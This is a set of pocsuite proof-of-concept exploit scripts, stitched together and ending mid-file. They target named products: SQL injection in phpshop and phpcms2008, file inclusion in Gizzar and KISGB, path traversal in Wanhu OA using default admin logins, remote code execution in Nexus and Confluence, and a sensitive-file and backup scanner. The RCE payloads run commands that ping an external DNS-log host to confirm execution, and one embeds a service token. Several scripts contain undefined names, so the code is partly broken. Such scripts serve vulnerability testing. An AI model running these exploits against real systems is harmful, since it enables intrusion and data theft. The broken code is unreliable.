#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class FilefindPOC(POCBase):
    vulID = '11'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-06-26' #漏洞公开的时间,不知道就写今天

    author = 'ly55521' #  PoC作者的大名
    createDate = '2017-06-26'# 编写 PoC 的日期
    updateDate = '2017-06-26'# PoC 更新的时间,默认和编写时间一样
    references = 'http://0535code.com/article/20170626_1829.shtml'# 漏洞地址来源,0day不用写
    name = 'Sensitive file info'# PoC 名称
    appPowerLink = '#'# 漏洞厂商主页地址
    appName = '#'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'info-disclosure'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        敏感文件泄漏漏洞
    ''' # 漏洞简要描述
    samples = ["http://law.zbj.com/.DS_Store",]# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危" #严重,高危,中危,低危

    #定义要测试的文件列表
    #后期 特殊文件根据 返回状态码减少误报
    filelist = [
    "/.svn/entries", #svn
    "/.svn/wc.db",
    "/.project", #project
    "/test/", #test
    "/test.txt",
    "/test.shtml",
    "/test.html",
    "/test.htm",
    "/test.php",
    "/test.php3",
    "/test.pl",
    "/test.py",
    "/test.pyc",
    "/test.jsp",
    "/test.cgi",
    "/test.cfm",
    "/test.aspx",
    "/test.asp",
    "/robot.txt", #robot
    "/.DS_Store", #DS_Store
    "/.git/config",#git
    "/phpinfo.php",#phpinfo
    "/.hg",
    "/README.md",
    "/.viminfo",
    "/.bash_history",
    "/.bashrc",
    "/crossdomain.xml",
    "/console",
    "/web-console",
    "/web_console",
    "/jmx-console",
    "/jmx_console",
    "/JMXInvokerServlet",
    "/invoker",
    "/nginx.conf",
    "/httpd.conf",
    "/user.txt",
    "/pass.txt",
    "/passwd.txt",
    "/password.txt",
    "/username.txt",
    "/LICENSE.txt",
    "/CHANGELOG.txt",
    "/INSTALL.txt",
    "/sitemap.xml",
    "/.htaccess",
    "/web.config",
    "/log",
    "/log.txt",
    "/CVS/Root",
    "/CVS/Entries",
    "/info.php",
    "/www.7z",
    "/www.rar",
    "/www.zip",
    "/www.tar.gz",
    "/wwwroot.zip",
    "/wwwroot.rar",
    "/wwwroot.7z",
    "/wwwroot.tar.gz",
    "/backup",
    "/backup.7z",
    "/backup.rar",
    "/backup.sql",
    "/backup.tar",
    "/backup.tar.gz",
    "/backup.zip",
    "/database.sql",
    "/index.7z",
    "/index.rar",
    "/index.sql",
    "/index.tar",
    "/index.tar.gz",
    "/index.zip",
    "/users.sql" ,
    "/phpmyadmin",
    "/pma",
    "/SiteServer",
    "/admin",
    "/Admin",
    "/manage",
    "/manager",
    "/manage/html",
    "/resin-admin",
    "/resin-doc",
    "/axis2-admin",
    "/admin-console",
    "/system",
    "/install",
    "/backup",
    "/tmp",
    "/file",
    "/xmlrpc.php",
    "/install.php",
    "/admin.php",
    "/login.php",
    "/zabbix",
    "/web-inf/web.xml",
    ]

    #验证漏洞 pocsuite -r 11-file-Sensitive-info.py -u 127.0.0.1 --verify
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url
        if vul_url[-1] == '/':
            vul_url = vul_url[:-1]
        #定义漏洞列表
        # payload_url = []
        # payload_content = []
        payload_dict = {}
        final_url = []
        #循环判断
        for file in self.filelist:
            targetURL = vul_url + file
            #print vul_url + file
            try:
                r = req.get(url=targetURL, timeout=1,allow_redirects=False) #禁止重定向
                r_text = r.text
                if r.status_code == 200:
                    payload_dict[targetURL] = r_text
                    # payload_url.append(targetURL)
                    # payload_content.append(r_text)
            except Exception as e:
                print("error",e,targetURL)

        # print payload_url
        # print payload_content
        #如果有结果则输出
        if len(payload_dict) != 0 :
            for i in payload_dict:
                if payload_dict.values().count(payload_dict[i]) == 1:
                    final_url.append(i)
            if ((len(final_url)) != 0 and (len(final_url)) <15):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Payload'] = str(final_url)   
        print('[+]11 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(FilefindPOC)




#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re


class TestPOC(POCBase):
    vulID = '64305'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2006-12-13'
    createDate = '2015-12-19'
    updateDate = '2015-12-19'
    references = ['http://www.sebug.net/vuldb/ssvid-64305']
    name = 'Gizzar &lt;= 03162002 (index.php) Remote File Include Vulnerability'
    appPowerLink = 'N/A'
    appName = 'Gizzar'
    appVersion = '03162002'
    vulType = 'Remote File Include'
    desc = '''
		Gizzar 03162002及早期版本的index.php脚本存在PHP远程文件包含漏洞，
		远程攻击者可以借助basePath参数中的URL执行任意PHP代码。
    '''
    samples = ['']

    def _attack(self):
        result = {}
        return self.parse_output(result)

    def _verify(self):
        # 利用index.php文件验证RFI漏洞
        result = {}
        # <?php echo md5('3.1416');?>
        payload = 'http://tool.scanv.com/wsl/php_verify.txt?'
        # 测试用的payload
        vulurl = '{url}/index.php?basePath={evil}'.format(url=self.url, evil=payload)
        # 伪造的HTTP头
        httphead = {
            'Host': 'www.google.com',
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive'
        }
        # 发送测试请求
        resp = req.get(vulurl, headers=httphead, timeout=50)
        # md5('3.1416')=d4d7a6b8b3ed8ed86db2ef2cd728d8ec
        match = re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', resp.content)
        # 如果成功匹配到md5('3.1416'),证明漏洞验证成功
        if match:
            # 返回测试信息
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        # parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.lib.core.enums import CUSTOM_LOGGING
from pocsuite.lib.core.log import LOGGER
from pocsuite.lib.core.poc import POCBase, Output
from pocsuite.utils import register
import requests

_print2 = lambda msg: LOGGER.log(CUSTOM_LOGGING.SYSINFO, msg)


class FileDownloadPOC(POCBase):
    vulID = 'WooYun-2014-65752'  # ssvid
    version = '???'
    author = ['jsj']
    vulDate = '2018-05-22'
    createDate = '2018-05-22'
    updateDate = '2018-05-22'
    references = ['???']
    name = 'file download'
    appPowerLink = '???'
    appName = '万户 OA'
    appVersion = '???'
    vulType = '任意文件遍历/下载'
    desc = '''
        万户OA多处无限制任意文件下载
    '''

    def base(self):
        info = {"urls": []}
        login_url = self.url + "/defaultroot/Logon!logon.action"
        point1 = self.url + "/defaultroot/netdisk/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x"
        point2 = self.url + "/defaultroot/information_manager/informationmanager_download.jsp?path=..&FileName=WEB-INF/web.xml&name=x"
        point3 = self.url + "/defaultroot/download_netdisk.jsp?path=1&fileName=../../WEB-INF/web&fileExtName=xml&fileSaveName=x"
        point4 = self.url + "/defaultroot/wage_manager/download_wage_excelMode.jsp?fileRealName=x&fileSaveName=../../WEB-INF/web.xml"

        index_page = requests.get(self.url)
        _print2("{} <-- {}".format(index_page.status_code, index_page.url))
        if index_page.status_code != 200:
            return "Can not connect the tartget!"

        page_1 = requests.get(point1, cookies=index_page.cookies, headers=index_page.headers)
        _print2("{} <-- {}".format(page_1.status_code, page_1.url))
        if page_1.status_code == 200:
            info["urls"].append(page_1.url)

        page_2 = requests.get(point2, cookies=index_page.cookies, headers=index_page.headers)
        _print2("{} <-- {}".format(page_2.status_code, page_2.url))
        if page_2.status_code == 200:
            info["urls"].append(page_2.url)

        login_page = requests.post(login_url,
                                   data={"domainAccount": "whir", "userAccount": "admin",
                                         "userPassword": "admin", "localeCode": "zh_CN",
                                         "isRemember": 1, "keyDigest": ""},
                                   cookies=index_page.cookies,
                                   headers=index_page.headers, )
        _print2("{} <-- {}".format(login_page.status_code, login_page.url))
        if login_page.status_code == 200:

            page_3 = requests.get(point3, cookies=login_page.cookies, headers=login_page.headers)
            _print("{} <-- {}".format(page_3.status_code, page_3.url))
            if page_3.status_code == 200:
                info["urls"].append(page_3.url)

            page_4 = requests.get(point4, cookies=login_page.cookies, headers=login_page.headers)
            _print2("{} <-- {}".format(page_4.status_code, page_4.url))
            if page_4.status_code == 200:
                info["urls"].append(page_4.url)

        elif not info["urls"]:
            return "Get 'org.apache.struts.action.LOCALE' failed!"
        if info["urls"]:
            return info
        else:
            return "There is not VUL on the target."

    def _attack(self):
        _print2("attack ...")
        result = Output(self)
        info = self.base()
        if isinstance(info, dict):
            result.success({"AttackInfo": info})
        else:
            LOGGER.log(CUSTOM_LOGGING.WARNING, info)
            result.fail(info)
        return result

    def _verify(self):
        _print2("verify ...")
        result = Output(self)
        info = self.base()
        if isinstance(info, dict):
            result.success({"VerifyInfo": info})
        else:
            LOGGER.log(CUSTOM_LOGGING.WARNING, info)
            result.fail(info)
        return result


register(FileDownloadPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.request import req 
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class EverythingPOC(POCBase):
    vulID = '19'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1' #默认为1
    vulDate = '2017-12-12' #漏洞公开的时间,不知道就写今天

    author = 'colorway' #  PoC作者的大名
    createDate = '2017-12-12'# 编写 PoC 的日期
    updateDate = '2017-12-12'# PoC 更新的时间,默认和编写时间一样
    references = 'https://jingyan.baidu.com/article/915fc414baf0be51384b206a.html'# 漏洞地址来源,0day不用写
    name = 'Everything Directory list'# PoC 名称
    appPowerLink = 'http://www.voidtools.com/'# 漏洞厂商主页地址
    appName = 'Everything'# 漏洞应用名称
    appVersion = 'all versions'# 漏洞影响版本
    vulType = 'info-disclosure'#漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        everything敏感文件漏洞
    ''' # 漏洞简要描述
    samples = []# 测试样列,就是用 PoC 测试成功的网站
    install_requires = [] # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危" #严重,高危,中危,低危
    
    def _verify(self):
        #定义返回结果
        result = {}
        #获取漏洞url
        vul_url = '%s' % self.url
        try:
            r = req.get(vul_url)
            r_content = r.content
            import re
            title =re.findall(r"<title>(.*)</title>",r_content)[0]
            #print title
            if "Everything" in title:
                #print u"发现漏洞"
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = vul_url
                result['VerifyInfo']['Payload'] = vul_url + str(r_content)             
        except Exception as e:
            raise e
        print('[+]19 poc done')
        return self.save_output(result)

    #漏洞攻击
    def _attack(self):
        result = {}
        # 攻击代码
        return self._verify()

    def save_output(self, result):
        #判断有无结果并输出
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

register(EverythingPOC)




#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = 'SSV-77845'  # vul ID
    version = '1'
    author = ['hh']
    vulDate = '2013-01-14'
    createDate = '2015-10-16'
    updateDate = '2015-10-16'
    references = ['https://www.exploit-db.com/exploits/24108/']
    name = 'CMS phpshop 2.0 - SQL Injection Vulnerability'
    appPowerLink = 'http://code.google.com/p/phpshop/downloads/list'
    appName = 'phpshop'
    appVersion = '2.0'
    vulType = 'SQL Injection'
    desc = '''
           ?page=admin/function_list&module_id=11 id变量未正确过滤,导致SQL注入漏洞
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        result = {}
        target_url = "/phpshop 2.0/?page=admin/function_list&module_id=11' union select 1,CONCAT(0x7162787671,0x50664e68584e4c584352,0x716a717171),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --"      
        response = req.get(self.url + target_url, headers=self.headers, timeout=10)
        content = response.content     
        match = re.search('qbxvqPfNhXNLXCRqjqqq',content)
        if match:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + target_url
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output

register(TestPOC)


#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

def get_url(url, refer):
    try:
        httpreq = req.Session()
        headers = {
        "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0",
        "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language" : "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Content-Type": "application/x-www-form-urlencoded",
        "Referer" : refer
        }
        resp = httpreq.get(url, headers=headers)
    except Exception as ex:
        resp = None
    return resp

class TestPOC(POCBase):
    name = 'phpcms2008 SQL Injection Vulnerability'
    vulID = '0'
    author = ['cws6']
    vulType = 'sql-inj'
    version = '1'
    references = ['https://www.seebug.org/vuldb/ssvid-62274']
    desc = '''phpcms2008 js.php存在sql注入'''

    vulDate = '2011-11-21'
    createDate = '2019-04-27'
    updateDate = '2019-04-27'

    appName = 'phpcms'
    appVersion = '2008'
    appPowerLink = 'http://www.phpcms.cn/'
    samples = ['re']

    def _attack(self):
        """attack mode"""
        result = {}
        payload1 = '/data/js.php?id=1'
        refer = "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
        resp = get_url(self.url + payload1,refer)
        dbname1 = re.findall("~(.*?)~", resp.content)
        if dbname1:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['Database'] = {}
            result['Database']['DBname'] = dbname1[0]
            
        return self.parse_output(result)

    def _verify(self):
        """verify mode"""
        result = {}
        payload1 = '/data/js.php?id=1'
        refer = "' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1"
        resp = get_url(self.url + payload1,refer)
        time.sleep(2)
        if resp:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
# -*- coding:utf-8 -*-


from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '65284'
    version = '1'
    vulDate = '1206806400'
    createDate = '1442937600'
    references = ['http://www.sebug.net/vuldb/ssvid-65284']
    name = 'KISGB Local File Inclusion'
    appPowerLink = 'http://sourceforge.net/projects/kisgb/'
    appName = 'KISGB (Keep It Simple Guest Book)'
    appVersion = '<=5.1.1'
    vulType = 'Local File Inclusion'
    desc = '''KISGB view_private.php文件在处理传入的参数时存在缺陷，导致产生本地文件包含漏洞。'''
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self, verify=True):
        result = {}
        vul_url = '%s/view_private.php?start=1&action=edit&tmp_theme=../../../../../../etc/passwd' % self.url
        response = req.get(vul_url, timeout=10).content

        if '/bin/bash' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output


register(TestPOC)



#!/usr/bin/env python
#coding=utf-8

import random
import json
import time
from string import ascii_letters

from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE

'''
CVE-2019-7238
需要Nexus服务器上有资源（比如Jar包）
'''
class Nexus3_RCE_POC(POCBase):
    vulID = 'Nexus3-CVE-2019-7238'
    appName = 'Nexus3'
    appVersion = 'Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-02-05'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-02-20'  # 编写 PoC 的日期
    updateDate = '2020-02-17'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/P1KC7wadbEZbHvavYQjbVA']  # 漏洞地址来源,0day不用写
    name = 'Nexus3 RCE'  # PoC 名称
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"高危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    http_proxy  = "http://127.0.0.1:8087"
    https_proxy = "https://127.0.0.1:8087"
    proxies = {"http": http_proxy, "https": https_proxy}

    def _verify(self):
        result={}

        vul_url = self.url
        
        target_url = vul_url + "/service/extdirect"

        headers = {'Referer':''}
        j = {
            "action":"coreui_Component",
            "method":"previewAssets",
            "data":[
                {"page":1,"start":0,"limit":25,"filter":[
                    {"property":"repositoryName","value":"*"},
                    {"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping {0}.{1}').waitFor()".format(self.BANNER, self.DOMAIN)},
                    {"property":"type","value":"jexl"}]
                }
            ],
            "type":"rpc","tid":4}
        
        try:
            req.post(target_url, json=j, headers=headers, proxies=self.proxies)
        except Exception as e:
            e.printStackTrace()
        
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)

    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            

    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


'''
CVE-2019-5475/CVE-2019-15588
需要管理员权限
'''
class Nexus2_RCE_POC(POCBase):
    vulID = 'Nexus2-CVE-2019-5475_15588'
    appName = 'Nexus2'
    appVersion = 'Nexus Repository Manager OSS/Pro <= 2.14.13'
    category = POC_CATEGORY.EXPLOITS.REMOTE
    vulType = VUL_TYPE.CODE_EXECUTION
    vulDate = '2019-09-09'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-09-13'  # 编写 PoC 的日期
    updateDate = '2020-02-17'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://hackerone.com/reports/654888']  # 漏洞地址来源,0day不用写
    name = 'Nexus2 RCE'  # PoC 名称
    appPowerLink = ['https://support.sonatype.com/hc/en-us']  # 漏洞厂商主页地址
    desc = '''
        Nexus Repository Manager 2 RCE
    '''  # 漏洞简要描述
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"中危"

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'wvg689.ceye.io'
    TOKEN = '76dce59a986eab595838f7dc74903035'
    BANNER = ''.join([random.choice(ascii_letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    http_proxy  = "http://127.0.0.1:8087"
    https_proxy = "https://127.0.0.1:8087"
    proxies = {"http": http_proxy, "https": https_proxy}

    def _verify(self):
        result={}
        
        capa_id_url = self.url + "/nexus/service/siesta/capabilities"


        headers = {
            "Accept": "application/json",
            "Authorization": "Basic YWRtaW46YWRtaW4xMjM=",    # base64 version of admin:admin123, ref: CVE-2019-9629
        }

        l_payload = [
            "ping {0}.{1}", 
            "ping {0}.{1} & /createrepo",
            "ping {0}.{1} ; /createrepo",
            "ping {0}.{1} | /createrepo",
            "ping {0}.{1} || /createrepo",
        ]

        vul_url = self.get_vul_url(capa_id_url, headers)

        target_url = vul_url
        
        try:
            for i in range(len(l_payload)):
                json_payload = self.get_json_payload(l_payload[i])
                req.put(target_url, json=json_payload, headers=headers, proxies=self.proxies)
        except Exception as e:
            e.printStackTrace()
        
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.test_dnslog(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)


    def get_json_payload(self, p_payload):
        return {
                "typeId": "yum",
                "enabled": "true",
                "properties": [
                {
                    "key": "createrepoPath",
                    "value": p_payload.format(self.BANNER, self.DOMAIN)
                }
              ]
            }

    ''' fetch the capability id '''
    def get_vul_url(self, p_url, p_headers):
        r = req.get(p_url, verify=False, headers=p_headers, allow_redirects=False)
        capa_id = ""
    
        if r.status_code == 200:
            if r.json():
                for j in r.json():
                    if j['capability']['typeId'] == "yum":
                        print("[*] Vulnerable id is: {0}".format(j['capability']['id']))
                        capa_id = j['capability']['id']

        elif r.status_code == 401:
            print("[!] User credentials wrong! Quit!")
            sys.exit()

        p_vul_url = p_url + "/" + capa_id
        return p_vul_url

    # 验证DNS已被解析，命令执行
    def test_dnslog(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            

    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

# 注册类
register_poc(Nexus3_RCE_POC)    # CVE-2019-7238
register_poc(Nexus2_RCE_POC)    # CVE-2019-5475/CVE-2019-15588

"""批量验证
pocsuite -r Nexus_poc.py --verify -f results.txt --threads 10 --report report.html
"""





#!/usr/bin/env python
# coding: utf-8
import os
import sys
import subprocess
from urllib.parse import urlparse
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = '0'
    version = '1.0'
    author = 'hancool'
    vulDate = '2019-5-14'
    createDate = '2019-5-28'
    updateDate = '2019-5-28'
    references = ['https://github.com/zerosum0x0/CVE-2019-0708','https://github.com/robertdavidgraham/rdpscan' ]
    name = 'Remote Desktop Services Remote Code Execution Vulnerability（CVE-2019-0708）Check'
    appPowerLink = 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708'
    appName = 'Windows'
    appVersion = '2003,XP,7,Server2008,Server2008 R2'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
    A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – 
    when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests. 
    This vulnerability is pre-authentication and requires no user interaction. 
    An attacker who successfully exploited this vulnerability could execute arbitrary code on the target system. 
    An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

    PS:
    目前检测脚本是利用 https://github.com/robertdavidgraham/rdpscan 提供的rdpscan来检测是否存在漏洞
    '''

    def _verify(self):
        def check_os_and_rdpscan_exist():
            binfile = ''
            if sys.platform.startswith('linux'):
                binfile = 'rdpscan_linux'
            elif sys.platform.startswith('win'):
                binfile = 'rdpscan_win.exe'
            elif sys.platform.startswith('darwin'):
                binfile = 'rdpscan_mac'

            rdpscan_pathname = os.path.join(os.path.abspath('.'),binfile)
            if not os.path.exists(rdpscan_pathname):
                raise(Exception('{} binfile not found in current path'.format(binfile)))

            return rdpscan_pathname

        def run_rdpscan(binfile,ip,port):
            args = [binfile,'--port',str(port),ip]
            process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False)

            try:
                stdout, stderr = process.communicate()
            except:
                process.kill()
                stdout, stderr = process.communicate()

            stdout = stdout.decode('utf-8').strip()
            returncode = process.returncode
            
            if returncode != 0:
                return False,None
            elif stdout is not None and 'VULNERABLE' in stdout:
                return True,stdout

            return False,None

        binfile = check_os_and_rdpscan_exist()
        result = {}
        pr = urlparse(self.url)
        if pr.port:  # and pr.port not in ports:
            ports = [pr.port]
        else:
            ports = [3389,13389,23389]
        for port in ports:
            try:
                target = '{}:{}'.format(pr.hostname, port)
                status,msg = run_rdpscan(binfile,pr.hostname,port)
                if status:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = target
                    result['extra'] = {}
                    result['extra']['evidence'] =  msg
                    break
            except:
                pass

        return self.parse_output(result)

    def _attack(self):
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not vulnerability')
        return output


register_poc(TestPOC)



#!/usr/bin/env python
#coding=utf-8

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase

import random
from string import letters


# 基础基类
class ConfluenceRcePOC(POCBase):
    vulID = '58'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2019-03-25'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-04-12'  # 编写 PoC 的日期
    updateDate = '2019-04-12'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://jira.atlassian.com/browse/CONFSERVER-57974', 'https://github.com/Yt1g3r/CVE-2019-3396_EXP/blob/master/RCE_exp.py']  # 漏洞地址来源,0day不用写
    name = 'Confluence RCE(CVE-2019-3396)'  # PoC 名称
    appPowerLink = ['https://jira.atlassian.com/']  # 漏洞厂商主页地址
    appName = 'Atlassian Confluence'  # 漏洞应用名称
    appVersion = '''6.6.12版本之前所有版本
6.7.0-6.12.2版本
6.13.3之前的所有6.13.x版本
6.14.2之前的所有6.14.x版本'''  # 漏洞影响版本
    vulType = 'Confluence RCE'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Atlassian Confluence 服务端模版注入/RCE
    '''  # 漏洞简要描述
    samples = ['https://www.shodan.io/search?query=confluence']  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重"  # 严重,高危,中危,低危


    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'xxx.ceye.io'   # 自己的ceye域名
    TOKEN = '76dce59a986eab595838f7dc7490xxxx'   # 自己的API TOKEN
    BANNER = ''.join([random.choice(letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    # 指纹方法
    def _fingerprint(self):
        pass

    # 验证模块 pocsuite -r xxx.py -u 10.0.0.1 --verify
    def _verify(self, _template="../web.xml", _cmd=""):
        # 调用指纹方法
        result={}

        vul_url = self.url

        target_url = vul_url + "/rest/tinymce/1/macro/preview"

        headers = {'Referer':vul_url + "/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&"}
        import json
        j = {"contentId":"55","macro":{"name":"widget","body":"",
                                       "params":{"url":"https://www.youtube.com/watch?v=shadowsock5","width":"1","height":"1",
                                                 "_template": _template,"cmd":_cmd}}}

        try:
            resp = req.post(target_url, json=j, headers=headers, timeout=2)
        except Exception as e:
            pass

        if resp.status_code == 200 and "<context-param>" in resp.text: # web.xml的标志之一
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
        return self.save_output(result)

    # 攻击模块
    def _attack(self):
        template = "https://pastebin.com/raw/RyUvk1h8"
        cmd = "ping {0}.{1}".format(self.BANNER, self.DOMAIN)
        self._verify(template, cmd)
        if self.dnslog_sucess(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
        return self.save_output(result)

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output


    # 验证DNS已被解析，命令执行
    def dnslog_sucess(self, url):
        _resp = req.get(url)
        d = _resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False

# 注册类
register(ConfluenceRcePOC)



#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
